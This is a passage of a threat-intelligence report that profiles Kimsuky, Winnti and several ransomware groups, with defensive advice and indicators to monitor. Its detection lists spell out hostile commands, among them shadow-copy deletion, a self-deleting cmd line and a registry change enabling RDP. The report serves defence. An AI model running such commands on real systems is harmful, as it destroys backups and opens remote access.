Kimsuky Group – A North Korean state-sponsored threat actor active since 2013, Kimsuky has been targeting organizations across the United States, Japan, Russia, Vietnam, and multiple European nations. Recently, the group has intensified its use of spear-phishing tactics, delivering malware through LNK files disguised as legitimate documents. When executed, these files trigger PowerShell or Mshta commands, which download and install the PebbleDash backdoor along with a custom-built RDP Wrapper, enabling remote system control. Kimsuky also employs proxy malware to facilitate communication between infected systems and external networks. These proxies allow the group to bypass network restrictions and maintain persistence within compromised environments.


Threat Labs summary

Securonix Threat Labs recommends leveraging our findings to deploy defensive measures against these threat activities. 

  • Regularly updating ERP software, web applications, and databases, implementing strict input validation with parameterized queries, and restricting database user permissions are essential measures to prevent SQL injection attacks and minimize potential damage.
  • Regularly scanning for unauthorized file modifications, disabling unnecessary scripting features on public-facing servers, and restricting access to web administration panels with multi-factor authentication (MFA) are crucial steps to prevent web shell deployments and unauthorized access.
  • Deploying advanced email security solutions to detect malicious LNK, PowerShell, and Mshta-based payloads, utilizing sandboxing to analyze attachments before delivery, and blocking LNK files from untrusted sources are crucial measures to prevent spear-phishing attacks.
  • Configuring Group Policy to block LNK execution from email attachments and restricting Mshta.exe and PowerShell execution for untrusted scripts are essential steps to prevent malware deployment and execution.
  • 12 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.


TTPs related to the Winnti group include but are not limited to the following:

  • Monitor for a modified DLL file: TSMSISrv.dll (DLL hijacking).
  • Monitor for execution of the file mresgui.dll, which is the Winnti loader.
  • Monitor for the DAT file that loads the Winnti RAT.
  • Monitor for the Winnti rootkit installer: amonitor.sys (“%SystemRoot%\System32\drivers\”).
  • Monitor for obfuscation using XOR or ChaCha20.


TTPs related to the Kimsuky group include but are not limited to the following:

  • Monitor for shortcut files (.LNK) with document-like icons initiating malicious commands using PowerShell or Mshta.
  • Monitor for a self-developed RDP Wrapper, which is used to enable remote access on systems that do not support RDP.
  • Monitor for the creation of mutexes like “MYLPROJECT” or “LPROXYMUTEX” (proxy tools, “C:\Programdata\USOShared2\version.ini”).
  • Monitor for keyloggers that store keystroke data in the files joeLog.txt and jLog.txt (“C:\Programdata\joeLog.txt” and “C:\Programdata\jLog.txt”).
  • Monitor for the file wbemback.dat being loaded into memory for stealthy execution (“%SystemDirectory%\wbemback.dat”).
  • Monitor for the file “Invoke-ReflectivePEInjection.ps1”, used for stealthy PowerShell-based payload execution (“%ALLUSERSPROFILE%\USOShared\Prosd\”).

Tags: APT Group: Winnti, Kimsuky | Target Sector: Gaming, Pharmaceuticals, Aerospace, and Critical Infrastructure | Target Regions: The United States, Japan, Russia, Vietnam, and European nations | Malware: PebbleDash, RDP Wrapper


Ransomware Trends & Threat Analysis

(Originally published in February 2025)

In March 2025, notable ransomware threats emerged, including VanHelsing Ransomware, which targets Windows, Linux, and VMware ESXi systems, utilizing a double extortion tactic with sophisticated encryption and exfiltration methods. The PlayBoy Locker RaaS group continues to gain traction, leveraging a Ransomware-as-a-Service (RaaS) model. Medusa Ransomware has also become a key threat, with a focus on critical infrastructure. Meanwhile, the Black Basta RaaS Group remains active, targeting multiple industries with its advanced ransomware techniques. These groups reflect the evolving ransomware landscape, with complex extortion strategies and widespread impact.

VanHelsing Ransomware – A newly emerged ransomware strain, operating under the RaaS model, has quickly captured attention due to its widespread targeting of both Windows and non-Windows systems, including Linux, BSD, ARM, and VMware ESXi, primarily in the U.S. and France. The group uses a double extortion approach, encrypting files with [.]vanhelsing and [.]vanlocker extensions while also exfiltrating sensitive data. With advanced evasion techniques and persistence mechanisms, detection and removal are challenging.

Affiliates pay $5,000 to join, with experienced cybercriminals able to join for free. The ransom revenue is split, with 20% going to the operator and 80% to the affiliates. The ransomware employs sophisticated encryption methods like Curve25519, AES, Salsa20/ChaCha, and XOR encoding for obfuscation. Communication with the group’s infrastructure is facilitated through onion links for ransom negotiation and data exfiltration.

Within just two weeks, the RaaS group has already infected three victims, demanding $500,000 in Bitcoin for file decryption and data removal, while avoiding countries in the Commonwealth of Independent States (CIS).

PlayBoy Locker RaaS – A newly emerged Ransomware-as-a-Service platform that provides unskilled cybercriminals with a comprehensive toolkit, including ransomware payloads, management dashboards, and dedicated support services, to conduct ransomware attacks. It has been active since 2024 and primarily targets Windows, NAS (Network-Attached Storage), and ESXi environments. The group employs HC-128 and Curve25519 encryption algorithms to effectively encrypt files across all connected devices within the network. The PlayBoy Locker affiliates operate on a revenue-sharing model in which affiliates keep 85% while operators retain only 15% of the ransom payments. Moreover, the ransomware is capable of encrypting a wide range of file formats including documents, multimedia, and database files across all compromised networks.

Medusa Ransomware – A joint advisory was released in March 2025 by CISA, the FBI, and MS-ISAC regarding Medusa ransomware, a RaaS group that has been active since 2021. The developers and affiliates have already impacted 300 victims in multiple sectors, including healthcare, education, legal, insurance, technology, and manufacturing. The group employs a double extortion model and advanced techniques to evade detection and disable endpoint detection systems, and leverages reverse tunneling tools like Ligolo and Cloudflared. Medusa ransomware infiltrates victims’ networks primarily through phishing campaigns and by exploiting unpatched vulnerabilities like the ScreenConnect flaw (CVE-2024-1709) and the Fortinet EMS SQL injection vulnerability (CVE-2023-48788). The affiliates deploy legitimate administration tools like Advanced IP Scanner and SoftPerfect Network Scanner to map out users, systems, and networks. Additionally, they use various remote access software such as AnyDesk, Atera, ConnectWise, and Splashtop to maintain access.

Black Basta RaaS Group – On February 11, internal chat logs of Black Basta RaaS members were leaked by the Russian user @ExploitWhispers. Black Basta, a prominent RaaS group that emerged in 2022, targets the industrial machinery and manufacturing sectors by exploiting supply chain vulnerabilities. The chat logs provide significant insights into the group’s operations, key member roles, infrastructure, and the existence of an advanced brute-forcing framework dubbed BRUTED. This tool, active since 2023, automates large-scale internet scanning and credential stuffing attacks against network edge devices, including corporate firewall and VPN solutions.

Black Basta affiliates leverage BRUTED to establish an initial foothold in the corporate networks, facilitating lateral movement and deployment of ransomware.


Threat Labs summary

Securonix Threat Labs recommends leveraging our findings to deploy protective measures for increased threats from these ransomware campaigns.

  • Configure encryption, authentication, and access controls for critical systems in both cloud and local environments.
  • Retain multiple secure copies of sensitive data and systems in separate locations, including physical devices or the cloud.
  • Require MFA for all services, especially for webmail, VPNs, and accounts accessing critical systems.
  • Ensure timely updates of operating systems, software, and firmware, prioritizing patches for known vulnerabilities, particularly in internet-facing systems.
  • Use network segmentation to control traffic and limit lateral movement, reducing ransomware spread.
  • Block unknown or untrusted sources from accessing remote services on internal systems, preventing adversary persistence.
  • Review domain controllers, servers, and active directories for unauthorized or unfamiliar accounts.
  • Restrict command-line tools and permissions to hinder privilege escalation and lateral movement by threat actors.
  • Ensure backup data is encrypted, immutable, and covers the full range of your data infrastructure to prevent tampering.
  • 31 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.


TTPs related to the VanHelsing Ransomware include but are not limited to the following:

  • Monitor for the encrypted file extensions [.]vanhelsing and [.]vanlocker.
  • Monitor for the unusual filename locker.exe appearing in C:\Users\ADMINI~1\AppData\Local\Temp\2\.
  • Monitor for Curve25519, AES, and Salsa20/ChaCha encryption. (The ransomware encrypts files using a combination of algorithms such as Curve25519, AES, Salsa20, or ChaCha, and uses XOR encoding for further obfuscation of the encrypted data.)
  • Monitor for the following PDB paths:
    • C:\Users\ADMINI~1\AppData\Local\Temp\2\74edcda8581f9636c83352ad946821b0\1-locker\Release\1-locker.pdb
    • C:\Users\ADMINI~1\AppData\Local\Temp\2\cd9563b4cbc415b3920633b93c0d351b\1-locker\Release\1-locker.pdb
  • Monitor for the mutex Global\VanHelsing.


TTPs related to the PlayBoy Locker Ransomware include but are not limited to the following:

  • Monitor for network scans using LDAP to enumerate machines, especially with credentials provided in the command. Look for command-line usage of LDAP utilities with unusual parameters (-ip, -u, -p).
  • Monitor for loading of RstrtMgr.dll by non-system processes, immediately followed by attempts to kill processes related to security software, databases, or backups.
  • Monitor for execution of vssadmin delete shadows /all /quiet (shadow copy deletion).
  • Monitor for the creation of files named INSTRUCTIONS.txt containing ransom demands, appearing in multiple directories.
  • Monitor for execution of the self-deletion command C:\Windows\System32\cmd.exe /C ping 127.0.0.1 -n 2 >nul del /F <file name> after other suspicious activities.


TTPs related to the Medusa Ransomware Group include but are not limited to the following:

  • Monitor for the [.]medusa file extension that is applied to encrypted files.
  • Monitor for the gaze.exe file, which terminates services including backup, security, database, communication, and file-sharing services.
  • Monitor for the Rclone tool (rclone.exe) being installed and used for data exfiltration to suspicious locations.
  • Monitor for certutil.exe, which is used to avoid detection.
  • Monitor for registry modifications enabling Remote Desktop connections (modifying fDenyTSConnections): reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • Monitor for PowerShell commands using the -nop, -w hidden, -noni, -ep bypass flags.
  • Monitor for execution of vssadmin delete shadows /all /quiet (shadow copy deletion).
  • Monitor for the creation of ransom notes (!!!READ_ME_MEDUSA!!!.txt) in multiple directories.

Tags: Ransomware Group: Medusa, Black Basta, VanHelsing | Target: Windows Systems, Linux, BSD, ARM, VMware ESXi, NAS | Target Sector: Healthcare, Education, Legal, Insurance, Technology, Manufacturing, and Industrial Machinery


For a full list of the search queries used on Autonomous Threat Sweeper for the threats detailed above, refer to our Threat Labs home page. The page also references a list of relevant policies used by threat actors.

We would like to hear from you. Please reach out to us at [email protected]

Note: The TTPs, when used in isolation, are prone to false positives and noise and should ideally be combined with the other indicators mentioned.

Contributors: Dheeraj Kumar and Sina Chehreghani
